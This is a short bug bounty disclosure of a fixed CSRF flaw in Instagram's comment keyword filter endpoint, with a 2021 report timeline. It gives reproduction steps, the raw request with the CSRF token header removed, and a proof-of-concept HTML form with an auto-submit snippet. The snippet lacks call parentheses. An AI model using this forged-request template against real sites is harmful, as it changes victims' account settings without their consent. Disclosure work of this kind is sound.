CSRF in Instagram
Description/Impact:
An attacker was able to change comment keyword filter on behalf of other users on Instagram.com by exploiting CSRF vulnerability .but after reporting this vulnerability the internal research of facebook found other vulnerable endpoint which might lead to account takover
Reproduction steps:
Step1:open https://www.instagram.com/accounts/comment_filter/
Step2:add any keyword and intercept the request
POST /accounts/set_comment_filter_keywords_web/ HTTP/1.1
Host:www.instagram.com
In the request there is an interesting header X-CSRFTOKEN this header verify if the request is coming from owner of account
when deleting this header the request will be send successfully and get the response
HTTP 200 OK
status { ok}
Here we can notice there no check of CSRF token
Step3: write the exploit of this vulnerability
<html>
<head>
<title>exploit csrf</title>
</head>
<body>
<form action="https://www.instagram.com/accounts/set_comment_filter_keywords_web/" method="POST">
<input type="hidden" name="keywords" value="test" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
You can also include auto submit script
<script>
document.forms[0].submit
</script>
Here we can notice there is no check of X-CSRFTOKEN and Origin
After fixing the initially reported bug, the further internal research identified other vulnerable endpoints
Timeline:
16/01/2021:I sent report
19/01/2021:Acknowledged by facebook
22/02/2021: fixed&bounty awarded